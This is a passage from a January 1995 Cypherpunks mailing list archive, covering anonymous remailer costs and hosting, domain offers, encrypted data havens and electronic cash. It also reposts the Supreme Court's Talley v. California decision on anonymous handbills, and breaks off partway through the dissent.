difficult is going to be a generalized scheme for key management: first off, I'm probably going to simply use PGP's web-of-trust as my model, assuming the X.509/PEM style certificates can be treated as degenerate cases of web of trust. I also intend to offer a GSSAPI interface to all of this, as seems appropriate when I get to it. This is so far all in C: I'm not a C++ convert yet and C is still the most portable of the languages about. Later, perhaps class libraries can be designed around the same code. Thoughts? Am I wasting my time, or is this a worthwhile pursuit? And should I find a better name than GUCAPI? -- Todd - --- [This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.] -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Gratis auto-signing service iQBFAwUBLx7wfCoZzwIn1bdtAQGIWAF9GgY29Qop9p1TEryO3oe/cFUyyBAJQtp7 yPGjEDyCvk/vtLHTAxhQoMTE98MMkPP1 =EoBl -----END PGP SIGNATURE----- From tedwards at src.umd.edu Thu Jan 19 15:27:14 1995 From: tedwards at src.umd.edu (Thomas Grant Edwards) Date: Thu, 19 Jan 95 15:27:14 PST Subject: Electronic cash illegal? In-Reply-To: <9501190336.AA12782@toxicwaste.media.mit.edu> Message-ID: On Wed, 18 Jan 1995, Derek Atkins wrote: > The US dollar is backed by trust alone, today. Actually, the "backing" of a fiat currency is the need to have some around to pay your taxes, else you go to jail. You are taxed on many types of income, even if they are not directly exchanged in the fiat currency. Somehow you have to get some. This also means that higher taxes can make the currency more desirable, lower taxes less, higher government spending less, lower government spending more, etc. -Thomas From root at einstein.ssz.com Thu Jan 19 15:42:38 1995 From: root at einstein.ssz.com (root) Date: Thu, 19 Jan 95 15:42:38 PST Subject: The Remailer Crisis In-Reply-To: Message-ID: <199501192344.RAA03508@einstein.ssz.com> > > I am currently using ISDN from my home in San Jose. You're right in > that the startup costs are the barrier--even a cheap single B channel > (56K) terminal adapter for use with a serial port will run $300-$400 > dollars. The telco charges are minimal in my area; $25 monthly for > the line itself (115 Kbps async bandwidth). Connect charges are free > for non peak usage, and $0.60/hour for peak usage time (0800 to 1700) > Mon-Fri. > I am also using ISDN to get my network on through Southwestern Bell. The charges I had to deal with were: $135 deposit (refunded in 2 years) $73 per month line rate (2B+D) $350 per month for ISDN connection to another system on Internet and in Austin there is only one system that can do this for .com sites. This is a commen problem all over the country I understand. $1150 for Combinet 160 w/ NT-1 for ISDN-Ethernet bridge. $750 for account setup and for the folks at the other end to configure. This is a little expensive for home use but well within the means of even small businesses. > This is the Pacific Bell "Residential" ISDN plan. For business lines, > it goes up to $50 monthly with $0.60/hour 24 hours a day. > I am lucky in that I am flat rate. > In addition to this would apply any standard long distance charges that > would apply to a particular call. > We get charged only for the D channel traffic which is usually used for call progress control. In general we don't use the D channel at all. > This is an excellent setup for fast, cheap, INTERMITTENT connection to > the Internet. My particular ISP is in Santa Cruz, with POPS in SC, SJ, > and soon Monterey. An unlimited connect time PPP account runs $75 monthly. > This actually gets me a three bit subnet so that I can put five IP boxes > and an ISDN router on my ethernet at home. > It is a clean, fast (300kbs w/ compression), and economical for a full time feed as well. From strick at versant.com Thu Jan 19 15:46:55 1995 From: strick at versant.com (strick at versant.com) Date: Thu, 19 Jan 95 15:46:55 PST Subject: *.techwood.org In-Reply-To: Message-ID: <9501192349.AA15217@versant.com> -----BEGIN PGP SIGNED MESSAGE----- THUS SPAKE jrochkin at cs.oberlin.edu (Jonathan Rochkind): # # Maybe it's time for Eric to figure out what he's going to do # with remailer.net. If anyone wants a third-level domain name *.techwood.org for their linux box, send me mail *from root* on your box, telling me what third-level name you want. (Techwood.org is the Techwood Broadcasting Foundation, incorporated under orbital law.) Put "techwood" in your Subject: line, and mail it to me at from root at your site. I will dig you and ping you to get your dotted quad for an A record, and I'll make an MX record that goes only to you. strick p.s. then in your /etc/sendmail.cf put a line like this Cz mumble.techwood.org (if you're running a recent UCB sendmail (like version 8.6 or later)) so that your site will accept mail destined to username at mumble.techwood.org. (and kill -1 your sendmail daemon) -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQBVAwUBLx75twq3IMgMJUNlAQE4JAH/Tolj835s+mLt6A2+AmH9rHIr7dUuYbZ5 VPIE4pnWn/CfQEx8DTwlKJN8Z5QlPfw/rWyahWpU/Thg7BbLypFfHg== =N/Gq -----END PGP SIGNATURE----- From Jaeson.M.Engle at josaiah.sewanee.edu Thu Jan 19 16:24:37 1995 From: Jaeson.M.Engle at josaiah.sewanee.edu (Rhys Kyraden) Date: Thu, 19 Jan 95 16:24:37 PST Subject: The Remailer Crisis Message-ID: -----BEGIN PGP SIGNED MESSAGE----- Just out of curiousity on this subject, is there any remailer software for Macs? I think I have enough leverage and power on my campus to be able to run a remailer here during the school months *which is when I have net access*. If there isn't, how hard would it be to do? Could it be done with something like MailShare indirectly? -----BEGIN PGP SIGNATURE----- Version: 2.6ui iQCVAgUBLx8CQkiLvmPjc4XdAQFS4wP/aufMYK054Ed5fZn84xLDSsXqF3+hv4jw uQKSUl6Kv46Ek+IypX0DwI31SqasS96vosC0W/p9uPO/MFoAyp9/EdcAkH65yWSO Gv3iQmm/j0Lx81dxTB4mjYZUdY3wJQFd4O/vY+mT9I6OmtE6lNDzYRyn9VCl7zfw t5G67Z6+Pas= =TosY -----END PGP SIGNATURE----- aka: (-: Jaeson M. Engle || jme at josaiah.sewanee.edu :-) (-: www server: http://josaiah.sewanee.edu/ :-) (-: It's January 29th! IT'S TIME!!! Ask me for details!:-) (-: Finger 'jme at josaiah.sewanee.edu' for my Public :-) PGP block. From eric at remailer.net Thu Jan 19 16:27:26 1995 From: eric at remailer.net (Eric Hughes) Date: Thu, 19 Jan 95 16:27:26 PST Subject: *.techwood.org In-Reply-To: <9501192349.AA15217@versant.com> Message-ID: <199501200027.QAA10644@largo.remailer.net> # Maybe it's time for Eric to figure out what he's going to do # with remailer.net. Standardization, is what. It's not ready, so no names yet. From: strick at versant.com If anyone wants a third-level domain name *.techwood.org for their linux box, send me mail *from root* on your box, telling me what third-level name you want. This is the right avenue right now for a non-.edu remailer address. Immediate, cheap, etc. And incidentally, it's a great idea to use a different domain name for these services. Eric From eric at remailer.net Thu Jan 19 16:33:41 1995 From: eric at remailer.net (Eric Hughes) Date: Thu, 19 Jan 95 16:33:41 PST Subject: The Remailer Crisis In-Reply-To: <199501192123.AA29095@panix.com> Message-ID: <199501200033.QAA10651@largo.remailer.net> From: frissell at panix.com (Duncan Frissell) I offer to pay for and operate a remailer account on any system that will have me. best.com, based in Mt. View, CA. Mail to postmaster at best.com, or try the other standard extensions. I'm sure there are others. Do we have the software yet to run a remailer out of an account? When I wrote the first cypherpunk remailer, this was a design criterion. In other words, yes. Eric From tcmay at netcom.com Thu Jan 19 16:56:16 1995 From: tcmay at netcom.com (Timothy C. May) Date: Thu, 19 Jan 95 16:56:16 PST Subject: The Remailer Crisis In-Reply-To: Message-ID: <199501200054.QAA11075@netcom21.netcom.com> Johnathan Corgan wrote: > I am currently using ISDN from my home in San Jose. You're right in > that the startup costs are the barrier--even a cheap single B channel > (56K) terminal adapter for use with a serial port will run $300-$400 > dollars. The telco charges are minimal in my area; $25 monthly for > the line itself (115 Kbps async bandwidth). Connect charges are free > for non peak usage, and $0.60/hour for peak usage time (0800 to 1700) > Mon-Fri. Well, let's do the math. Since the remailer has to be connected at all times, of course, this implies $162 a month in connect charges, over and above the other charges. Or $187 a month including the line charge. Or $2244 a year. This makes a "cheap Linux box" almost a moot point. This is a lot more than I'm willing to pay to run a remailer. (I can imagine workarounds that involve connecting at regular intervals to pick up mail....assuming it "accumulates" somewhere (?), but the goal of a remailer "on the Net" is what I'm after.) > A remailer in this scenario would need to have their MX record point to > their ISP, and process mail via POP (incoming) and SMTP (outgoing). > It would be straightforward to implement a timed or demand dial scenario > (say, every fifteen minutes) to accomplish this. While not the ideal > (continuous internet connection with pure SMTP based mail transport), it > would suffice for a moderately loaded remailer, I'd imagine. > > Of course, this involves the mail subsystem of your ISP, partially > defeating the purpose of having ubiquitous anonymous remailer "instances" > whose operation is outside the control of an ISP. Still, it would be > a good start. I agree that it's something to look at. --Tim May -- .......................................................................... Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at netcom.com | anonymous networks, digital pseudonyms, zero | knowledge, reputations, information markets, W.A.S.T.E.: Aptos, CA | black markets, collapse of governments. Higher Power: 2^859433 | Public Key: PGP and MailSafe available. Cypherpunks list: majordomo at toad.com with body message of only: subscribe cypherpunks. FAQ available at ftp.netcom.com in pub/tc/tcmay From unicorn at access.digex.net Thu Jan 19 16:56:32 1995 From: unicorn at access.digex.net (Black Unicorn) Date: Thu, 19 Jan 95 16:56:32 PST Subject: Does encrypted equal safe? In-Reply-To: <9501172355.AA12246@eri.erinet.com> Message-ID: On Tue, 17 Jan 1995, Paul J. Ste. Marie wrote: > Date: Tue, 17 Jan 95 18:55:30 EST > From: Paul J. Ste. Marie > To: Eric Hughes , cypherpunks at toad.com > Subject: Re: Does encrypted equal safe? > > At 01:28 PM 1/17/95 -0800, Eric Hughes wrote: > > ... Meaning is subjective. If I see encrypted text, am I to be held > >responsible for having seen through an encryption for which I hold not > >the key? Merely because someone knows a transformation into a > >disapproved form does not mean that I do. ... > > Which is exactly why the encrypt on receipt or decrypt on delivery ideas > won't work. You have to be provably ignorant of the data. > I must disagree. This hinges on the REASON for encrypting the data. In my model, data that arrives at the haven unencrypted is unwelcome, and is encrypted to be used as traffic "noise," not for security. Any unencrypted data is undesireable, it opening the door to kiddieporn by mail tactics. (Government sends user A kiddie porn, then arrests user A for kiddie porn possession.) An automatic encryption of all unencrypted data, the key to which is randomly generated and destroyed, allows the traffic to foil analysis, while prevents the operator from being subjected to plant frames. Decrypt on arrival is hardly defenseable in this context of course. > > --Paul J. Ste. Marie > pstemari at well.sf.ca.us, pstemari at erinet.com > > -uni- (Dark) -- 073BB885A786F666 nemo repente fuit turpissimus - potestas scientiae in usu est 6E6D4506F6EDBC17 quaere verum ad infinitum, loquitur sub rosa - wichtig! From sameer at c2.org Thu Jan 19 17:08:28 1995 From: sameer at c2.org (sameer) Date: Thu, 19 Jan 95 17:08:28 PST Subject: The Remailer Crisis In-Reply-To: <199501200033.QAA10651@largo.remailer.net> Message-ID: <199501200105.RAA05837@infinity.c2.org> > > From: frissell at panix.com (Duncan Frissell) > > I offer to pay for and operate a remailer account on any system that will > have me. > > best.com, based in Mt. View, CA. Mail to postmaster at best.com, or try > the other standard extensions. > > I'm sure there are others. > To my knowledge there exists 3 packages which allow you to run a remailer out of an account. Matt Ghio's remailer, mixmaster (Lance Cottrell?), and the simple package available on ftp.csua.berkeley.edu, which derives from Eric and Hal's original code. c2.org, of course, welcomes remailers. -- sameer Voice: 510-841-2014 Network Administrator Pager: 510-321-1014 Community ConneXion: The NEXUS-Berkeley Dialin: 510-549-1383 http://www.c2.org (or login as "guest") sameer at c2.org From grendel at netaxs.com Thu Jan 19 17:45:27 1995 From: grendel at netaxs.com (Michael Handler) Date: Thu, 19 Jan 95 17:45:27 PST Subject: What is this? Anonymous message failed In-Reply-To: Message-ID: On Wed, 18 Jan 1995, Lucky Green wrote: > Just got back a message from Julf's remailer that my Anonymous message failed > (wrong password). Needless to say, I didn't try to send one through the > remailer. The message it was refering to is the one I sent to the list > earlier. Is this a repeat of the an/na problems we had in the past? Yes. The unfortunate culprit was . I sent him mail, non-blinded, and posted a message to Cypherpunks and to to get it fixed. I haven't been getting them anymore, so I suspect somebody fixed the problem. A while ago, someone posted a regexp for majordomo that would automatically convert a address to a address. Does anyone have that lying around anywhere? Michael From nzook at bga.com Thu Jan 19 18:06:00 1995 From: nzook at bga.com (Nathan Zook) Date: Thu, 19 Jan 95 18:06:00 PST Subject: Which remailer does Julf operate? Message-ID: sez it all Nathan From jcorgan at scruznet.com Thu Jan 19 19:31:04 1995 From: jcorgan at scruznet.com (Johnathan Corgan) Date: Thu, 19 Jan 95 19:31:04 PST Subject: The Remailer Crisis Message-ID: -----BEGIN PGP SIGNED MESSAGE----- >Well, let's do the math. Since the remailer has to be connected at all >times, of course, this implies $162 a month in connect charges, over >and above the other charges. Or $187 a month including the line >charge. Or $2244 a year. > >This makes a "cheap Linux box" almost a moot point. This is a lot more >than I'm willing to pay to run a remailer. > >(I can imagine workarounds that involve connecting at regular >intervals to pick up mail....assuming it "accumulates" somewhere (?), >but the goal of a remailer "on the Net" is what I'm after.) Well, yes, this is true. My point was that reliable, fast, easy to use bandwidth on the order of 128 Kbps is available now in some areas for relatively cheap rates. _With the condition_ that continuous access is not necessary to run a remailer (as I had outlined), this could prove to be a good jumping off ground for some remailer operators. Sheesh, I could start my own on my home ethernet if I were so inclined. The solution to the access fee problem is, of course, sharing that fee with other payees. Your example of putting boxes directly on TLG's network is a good example of this. >I agree that it's something to look at. We don't disagree here; we are solving two different problems it appears. == Johnathan Corgan "Violence is the last refuge of the incompetent." jcorgan at scruznet.com -Isaac Asimov -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBLx8uG01Diok8GKihAQHClwP/fVWl/GWM9lWArj4qP4orDV9ZGJWqaCEj LJYVSekzetdxIn2iBfTcCLCSwYKqTsJgCKha8tqxM9H5Zq2hVUYat9TlGKBZwpfr b/Vy+N3K1o/+E3NnWxcsJPLaeJfkom1sIJZiZkXKrqUM2v7v2l8MERub7uYG/EIl 5LhaDwdg9ig= =Acce -----END PGP SIGNATURE----- From jamesd at netcom.com Thu Jan 19 19:52:47 1995 From: jamesd at netcom.com (James A. Donald) Date: Thu, 19 Jan 95 19:52:47 PST Subject: The Remailer Crisis In-Reply-To: <199501200054.QAA11075@netcom21.netcom.com> Message-ID: On Thu, 19 Jan 1995, Timothy C. May wrote: > Well, let's do the math. Since the remailer has to be connected at all > times, of course, this implies $162 a month in connect charges, over > and above the other charges. Or $187 a month including the line > charge. Or $2244 a year. > > This makes a "cheap Linux box" almost a moot point. This is a lot more > than I'm willing to pay to run a remailer. Best.com offers a dedicated 28.8kB line connection to the internet with $450 setup charge and $60 a month connect charge. This is a permanent connection, not a dial up connection. This works out to $720 per year, plus setup charge. This is as cheap as it gets for a box on the internet. Now this is OK if one wishes to run linux, and have a remailer as one hobby in addition to the main use of the box, but it is still a bit much to pay for a dedicated remailer. Now I just do not like linux. Sure it is a great operating system but it will not run codewright (Vi causes mental degeneration. Even though I detest, loath, and hate vi, vi takes up so much brainspace that I find myself issueing vi commands in editors that I use much more, and vastly prefer to vi. Vi is evil.) Therefore there is no way in the world I am going to waste a full internet connection and a PC on linux. --------------------------------------------------------------------- | We have the right to defend ourselves | http://www.catalog.com/jamesd/ and our property, because of the kind | of animals that we are. True law | James A. Donald derives from this right, not from the | arbitrary power of the omnipotent state. | jamesd at netcom.com From stjude at well.sf.ca.us Thu Jan 19 20:27:16 1995 From: stjude at well.sf.ca.us (Judith Milhon) Date: Thu, 19 Jan 95 20:27:16 PST Subject: stjude? Message-ID: <199501200427.UAA16720@well.sf.ca.us> i'd be happy to get forwarded the skirmishes around my existence. Anybody save them? i'm not on the list because i'm writing 2 books, but i have root in the solar system, true, and i did come up with the name cypherpunk one morning as i was washing my cat... hit me like a meteorite... cypherpunk... yes... mumble >jude< From abacard at well.sf.ca.us Thu Jan 19 20:37:51 1995 From: abacard at well.sf.ca.us (Andre Bacard) Date: Thu, 19 Jan 95 20:37:51 PST Subject: Supreme Court & Anonymity Message-ID: <199501200437.UAA20363@well.sf.ca.us> -----BEGIN PGP SIGNED MESSAGE----- Attached is a Supreme Court decision that may bear directly upon anonymous remailers and upon people who want to curtail anonymous remailers. This info came from Dave Banisar at EPIC via Stanton McCandlish at EFF . Thanks to Attorney Banisar for supplying this information. See you in the future, Andre - ------------------------------------------------------------ Andre Bacard Bacard wrote "The Computer Privacy Box 3009 Handbook: A Practical Guide to E-Mail Stanford, CA 94309 Encryption, Data Protection, and PGP abacard at well.com Privacy Software" [for novices/experts]. Introduction by Mitchell Kapor, Chairman, Electronic Frontier Foundation and Founder of Lotus 1-2-3. Book Available February 1995. Write for Details - ------------------------------------------------------------ TALLEY v. CALIFORNIA SUPREME COURT OF THE UNITED STATES 362 U.S. 60 January 13-14, 1960, Argued March 7, 1960, Decided Certiorari to the Appellate Department of the Superior Court of California, Los Angeles County. 172 Cal. App. 2d Supp. 797, 332 P. 2d 447, reversed. A. L. Wirin and Hugh R. Manes argued the cause for petitioner. With them on the brief was Fred Okrand. Philip E. Grey argued the cause forrespondent. With him on the brief was Roger Arnebergh. Shad Polier, Will Maslow, Leo Pfeffer and Joseph B. Robison filed a brief for the American Jewish Congress, as amicus curiae, urging reversal. Warren, Black, Frankfurter, Douglas, Clark, Harlan, Brennan, Whittaker, Stewart MR. JUSTICE BLACK delivered the opinion of the Court. The question presented here is whether the provisions of a Los Angeles City ordinance restricting the distribution of handbills "abridge the freedom of speech and of the press secured against state invasion by the Fourteenth Amendment of the Constitution." n1 The ordinance, @ 28.06 of the Municipal Code of the City of Los Angeles, provides: "No person shall distribute any hand-bill in any place under any circumstances, which does not have printed on the cover, or the face thereof, the name and address of the following: "(a) The person who printed, wrote, compiled or manufactured the same. "(b) The person who caused the same to be distributed; provided, however, that in the case of a fictitious person or club, in addition to such fictitious name, the true names and addresses of the owners, managers or agents of the person sponsoring said hand-bill shall also appear thereon." The petitioner was arrested and tried in a Los Angeles Municipal Court for violating this ordinance. It was stipulated that the petitioner had distributed handbills in Los Angeles, and two of them were presented in evidence. Each had printed on it the following: National Consumers Mobilization, Box 6533, Los Angeles 55, Calif. PLeasant 9-1576. The handbills urged readers to help the organization carry on a boycott against certain merchants and businessmen, whose names were given, on the ground that, as one set of handbills said, they carried products of "manufacturers who will not offer equal employment opportunities to Negroes, Mexicans, and Orientals." There also appeared a blank, which, if signed, would request enrollment of the signer as a "member of National Consumers Mobilization," and which was preceded by a statement that "I believe that every man should have an equal opportunity for employment no matter what his race, religion, or place of birth." The Municipal Court held that the information printed on the handbills did not meet the requirements of the ordinance, found the petitioner guilty as charged, and fined him $ 10. The Appellate Department of the Superior Court of the County of Los Angeles affirmed the conviction, rejecting petitioner's contention, timely made in both state courts, that the ordinance invaded his freedom of speech and press in violation of the Fourteenth and First Amendments to the Federal Constitution. n2 172 Cal. App. 2d Supp. 797, 332 P. 2d 447. Since this was the highest state court available to petitioner, we granted certiorari to consider this constitutional contention. 360 U.S. 928. In Lovell v. Griffin, 303 U.S. 444, we held void on its face an ordinance hat comprehensively forbade any distribution of literature at any time or place in Griffin, Georgia, without a license. Pamphlets and leaflets, it was pointed out, "have been historic weapons in the defense of liberty" n3 and enforcement of the Griffin ordinance "would restore the system of license and censorship in its baldest form." Id., at 452. A year later we had before us four ordinances each forbidding distribution of leaflets - -- one in Irvington, New Jersey, one in Los Angeles, California, one in Milwaukee, Wisconsin, and one in Worcester, Massachusetts. Schneider v. State, 308 U.S. 147. Efforts were made to distinguish these four ordinances from the one held void in the Griffin case. The chief grounds urged for distinction were that the four ordinances had been passed to prevent either frauds, disorder, or littering, according to the records in these cases, and another ground urged was that two of the ordinances applied only to certain city areas. This Court refused to uphold the four ordinances on those grounds pointing out that there were other ways to accomplish these legitimate aims without abridging freedom of speech and press. Frauds, street littering and disorderly conduct could be denounced and punished as offenses, the Court said. Several years later we followed the Griffin and Schneider cases in striking down a Dallas, Texas, ordinance which was applied to prohibit the dissemination of information by the distribution of handbills. We said that although a city could punish any person for conduct on the streets if he violates a valid law, "one who is rightfully on a street . . . carries with him there as elsewhere the constitutional right to express his views in an orderly fashion . . . by handbills and literature as well as by the spoken word." Jamison v. Texas, 318 U.S. 413, 416. The broad ordinance now before us, barring distribution of "any hand-bill in any place under any circumstances," n4 falls precisely under the ban of our prior cases unless this ordinance is saved by the qualification that handbills can be distributed if they have printed on them the names and addresses of the persons who prepared, distributed or sponsored them. For, as in Griffin, the ordinance here is not limited to handbills whose content is "obscene or offensive to public morals or that advocates unlawful conduct." Counsel has urged that this ordinance is aimed at providing a way to identify those responsible for fraud, false advertising and libel. Yet the ordinance is in no manner so limited, nor have we been referred to any legislative history indicating such a purpose. Therefore we do not pass on the validity of an ordinance limited to prevent these or any other supposed evils. This ordinance simply bars all handbills under all circumstances anywhere that do not have the names and addresses printed on them in the place the ordinance requires. There can be no doubt that such an identification requirement would tend to restrict freedom to distribute information and thereby freedom of expression. "Liberty of circulating is as essential to that freedom as liberty of publishing; indeed, without the circulation, the publication would be of little value." Lovell v. Griffin, 303 U.S., at 452. Anonymous pamphlets, leaflets, brochures and even books have played an important role in the progress of mankind. Persecuted groups and sects from time to time throughout history have been able to criticize oppressive practices and laws either anonymously or not at all. The obnoxious press licensing law of England, which was also enforced on the Colonies was due in part to the knowledge that exposure of the names of printers, writers and distributors would lessen the circulation of literature critical of the government. The old seditious libel cases in England show the lengths to which government had to go to find out who was responsible for books that were obnoxious to the rulers. John Lilburne was whipped, pilloried and fined for refusing to answer questions designed to get evidence to convict him or someone else for the secret distribution of books in England. Two Puritan Ministers, John Penry and John Udal, were sentenced to death on charges that they were responsible for writing, printing or publishing books. n6 Before the Revolutionary War colonial patriots frequently had to conceal their authorship or distribution of literature that easily could have brought down on them prosecutions by English-controlled courts. Along about that time the Letters of Junius were written and the identity of their author isunknown to this day. n7 Even the Federalist Papers, written in favor of the adoption of our Constitution, were published under fictitious names. It is plain that anonymity has sometimes been assumed for the most constructive purposes. We have recently had occasion to hold in two cases that there are times and circumstances when States may not compel members of groups engaged in the dissemination of ideas to be publicly identified. Bates v. Little Rock, 361 U.S. 516; N. A. A. C. P. v. Alabama, 357 U.S. 449, 462. The reason for those holdings was that identification and fear of reprisal might deter perfectly peaceful discussions of public matters of importance. This broad Los Angeles ordinance is subject to the same infirmity. We hold that it, like the Griffin, Georgia, ordinance, is void on its face. The judgment of the Appellate Department of the Superior Court of the State of California is reversed and the cause is remanded to it for further proceedings not inconsistent with this opinion. It is so ordered. Footnotes n1 Schneider v. State, 308 U.S. 147, 154. Cf. Lovell v. Griffin, 303 U.S. 444, 450. n2 Petitioner also argues here that the ordinance both on its face and as construed and applied "arbitrarily denies petitioner equal protection of the laws in violation of the Due Process and Equal Protection" Clauses of the Fourteenth Amendment. This argument is based on the fact that the ordinance applies to handbills only, and does not include within its proscription books, magazines and newspapers. Our disposition of the case makes it unnecessary to consider this contention. n3 The Court's entire sentence was: "These [pamphlets and leaflets] indeed have been historic weapons in the defense of liberty, as the pamphlets of Thomas Paine and others in our own history abundantly attest." It has been noted that some of Thomas Paine's pamphlets were signed with pseudonyms. See Bleyer, Main Currents in the History of American Journalism (1927), 90-93. Illustrations of other anonymous and pseudonymous pamphlets and other writings used to discuss important public questions can be found in this same volume. n4 Section 28.00 of the Los Angeles Municipal Code defines "handbill" as follows: "'HAND-BILL' shall mean any hand-bill, dodger, commercial advertising circular, folder, booklet, letter, card, pamphlet, sheet, poster, sticker, banner, notice or other written, printed or painted matter calculated to attract attention of the public." n5 Lovell v. Griffin, 303 U.S., at 451. n6 Penry was executed and Udal died as a result of his confinement. 1 Hallam, The Constitutional History of England (1855), 205-206, 232. n7 In one of the letters written May 28, 1770, the author asked the following question about the tea tax imposed on this country, a question which he could hardly have asked but for his anonymity: "What is it then, but an odious, unprofitable exertion of a speculative right, and fixing a badge of slavery upon the Americans, without service to their masters?" 2 Letters of Junius (1821) 39. MR. JUSTICE HARLAN, concurring. In judging the validity of municipal action affecting rights of speech or association protected against invasion by the Fourteenth Amendment, I do not believe that we can escape, as Mr. Justice Roberts said in Schneider v. State, 308 U.S. 147, 161, "the delicate and difficult task" of weighing "the circumstances" and appraising "the substantiality of the reasons advanced in support of the regulation of the free enjoyment of" speech. More recently we have said that state action impinging on free speech and association will not be sustained unless the governmental interest asserted to support such impingement is compelling. See N. A. A. C. P. v. Alabama, 357 U.S. 449, 463, 464; Sweezy v. New Hampshire, 354 U.S. 234, 265 (concurring opinion); see also Bates v. Little Rock, 361 U.S. 516. Here the State says that this ordinance is aimed at the prevention of "fraud, deceit, false advertising, negligent use of words, obscenity, and libel," in that it will aid in the detection of those responsible for spreading material of that character. But the ordinance is not so limited, and I think it will not do for the State simply to say that the circulation of all anonymous handbills must be suppressed in order to identify the distributors of those that may be of an obnoxious character. In the absence of a more substantial showing as to Los Angeles' actual experience with the distribution of obnoxious handbills, * such a generality is for me too remote to furnish a constitutionally acceptable justification for the deterrent effect on free speech which this all-embracing ordinance is likely to have. On these grounds I concur in the judgment of the Court. Footnotes: * On the oral argument the City Attorney stated: "We were able to find out that prior to 1931 an effort was made by the local Chamber of Commerce, urging the City Council to do something about these handbills and advertising matters which were false and misleading -- had no names of sponsors. They were particularly interested in the fictitious name. They said, 'Who are these people that are distributing; who are advertising; doing things of that sort?' The meager record that we were able to find indicates that a request from the Council to the City Attorney as to their legal opinion on this subject [sic]. The City Attorney wrote back and formed the conclusion that distribution of handbills, pamphlets, or other matters, without the name of the fictitious firm or officers would be legal [sic]. Thereafter in the early part of 1932 an ordinance was drafted, and submitted to the City Council, and approved by them, which related to the original subject -- unlawful for any person, firm or association to distribute in the city of Los Angeles any advertisement or handbill - -- or any other matter which does not have the names of the sponsors of such literature." MR. JUSTICE CLARK, whom MR. JUSTICE FRANKFURTER and MR. JUSTICE WHITTAKER join, dissenting. To me, Los Angeles' ordinance cannot be read as being void on its face. Certainly a fair reading of it does not permit a conclusion that it prohibits the distribution of handbills "of any kind at any time, at any place, and in any manner," Lovell v. Griffin, 303 U.S. 444, 451 (1938), as the Court seems to conclude. In Griffin, the ordinance completely prohibited the unlicensed distribution of any handbills. As I read it, the ordinance here merely prohibits the distribution of a handbill which does not carry the identification of the name of the person who "printed, wrote, compiled . . . manufactured [or] . . . caused" the distribution of it. There could well be a compelling reason for such a requirement. The Court implies as much when it observes that Los Angeles has not "referred to any legislative history indicating" that the ordinance was adopted for the purpose of preventing "fraud, false advertising and libel." But even as to its legislative background there is pertinent material which the Court overlooks. At oral argument, the City's chief law enforcement officer stated that the ordinance was originally suggested in 1931 by the Los Angeles Chamber of Commerce in a complaint to the City Council urging it to "do something about these handbills and advertising matters which were false and misleading." Upon inquiry by the Council, he said, the matter was referred to his office, and the Council was advised that such an ordinance as the present one would be valid. He further stated that this ordinance, relating to the original inquiry of the Chamber of Commerce, was thereafter drafted and submitted to the Council. It was adopted in 1932. In the face of this and the presumption of validity that the ordinance enjoys, the Court nevertheless strikes it down, stating that it "falls precisely under the ban of our prior cases." This cannot follow, for in each of the three cases cited, the ordinances either "forbade any distribution of literature . . . without a license," Lovell v. Griffin, supra, or forbade, without exception, any distribution of handbills on the streets, Jamison v. Texas, 318 U.S. 413 (1943); or, as in Schneider v. State, 308 U.S. 147 (1939), which covered different ordinances in four cities, they were either outright bans or prior restraints upon the distribution of handbills. I, therefore, cannot see how the Court can conclude that the Los Angeles ordinance here "falls precisely" under any of these cases. On the contrary, to my mind, they neither control this case nor are apposite to it. In fact, in Schneider, depended upon by the Court, it was held, through Mr. Justice Roberts, that, "In every case . . . where legislative abridgment of the rights is asserted, the courts should be astute to examine the effect of the challenged legislation . . . weigh the circumstances and . . . appraise the substantiality of the reasons advanced . . . ." Id., at 161. The Court here, however, makes no appraisal of the circumstances, or the substantiality of the claims of the litigants, but strikes down the ordinance as being "void on its face." I cannot be a party to using such a device as an escape from the requirements of our cases, the latest of which was handed down only last month. Bates v. Little Rock, 361 U.S. 516. n1 Therefore, before passing upon the validity of the ordinance, I would weigh the interests of the public in its enforcement against the claimed right of Talley. The record is barren of any claim, much less proof, that he will suffer any injury whatever by identifying the handbill with his name. Unlike N. A. A. C. P. v. Alabama, 357 U.S. 449 (1958), which is relied upon, there is neither allegation nor proof that Talley or any group sponsoring him would suffer "economic reprisal, loss of employment, threat of physical coercion [or] other manifestations of public hostility." Id., at 462. Talley makes no showing whatever to support his contention that a restraint upon his freedom of speech will result from the enforcement of the ordinance. The existence of such a restraint is necessary before we can strike the ordinance down. But even if the State had this burden, which it does not, the substantiality of Los Angeles' interest in the enforcement of the ordinance sustains its validity. Its chief law enforcement officer says that the enforcement of the ordinance prevents "fraud, deceit, false advertising, negligent use of words, obscenity, and libel," and, as we have said, that such was its purpose. In the absence of any showing to the contrary by Talley, this appears to me entirely sufficient. I stand second to none in supporting Talley's right of free speech -- but not his freedom of anonymity. The Constitution says nothing about freedom of anonymous speech. In fact, this Court has approved laws requiring no less than Los Angeles' ordinance. I submit that they control this case and require its approval under the attack made here. First, Lewis Publishing Co. v. Morgan, 229 U.S. 288 (1913), upheld an Act of Congress requiring any newspaper using the second-class mails to publish the names of its editor, publisher, owner, and stockholders. 39 U. S. C. @ 233. Second, in the Federal Regulation of Lobbying Act, 2 U. S. C. @ 267, Congress requires those engaged in lobbying to divulge their identities and give "a modicum of information" to Congress. United States v. Harriss, 347 U.S. 612, 625 (1954). Third, the several States have corrupt practices acts outlawing, inter alia, the distribution of anonymous publications with reference to political candidates. n2 While these statutes are leveled at political campaign and election practices, the underlying ground sustaining their validity applies with equal force here. No civil right has a greater claim to constitutional protection or calls for more rigorous safeguarding than voting rights. In this area the danger of coercion and reprisals -- economic and otherwise -- is a matter of common knowledge. Yet these statutes, disallowing anonymity in promoting one's views in election campaigns, have expressed the overwhelming public policy of the Nation. Nevertheless the Court is silent about this impressive authority relevant to the disposition of this case. All three of the types of statutes mentioned are designed to prevent the same abuses -- libel, slander, false accusations, etc. The fact that some of these statutes are aimed at elections, lobbying, and the mails makes their restraint no more palatable, nor the abuses they prevent less deleterious to the public interest, than the present ordinance. All that Los Angeles requires is that one who exercises his right of free speech through writing or distributing handbills identify himself just as does one who speaks from the platform. The ordinance makes for the responsibility in writing that is present in public utterance. When and if the application of such an ordinance in a given case encroaches on First Amendment freedoms, then will be soon enough to strike that application down. But no such restraint has been shown here. After all, the public has some rights against which the enforcement of freedom of speech would be "harsh and arbitrary in itself." Kovacs v. Cooper, 336 U.S. 77, 88 (1949). We have upheld complete proscription of 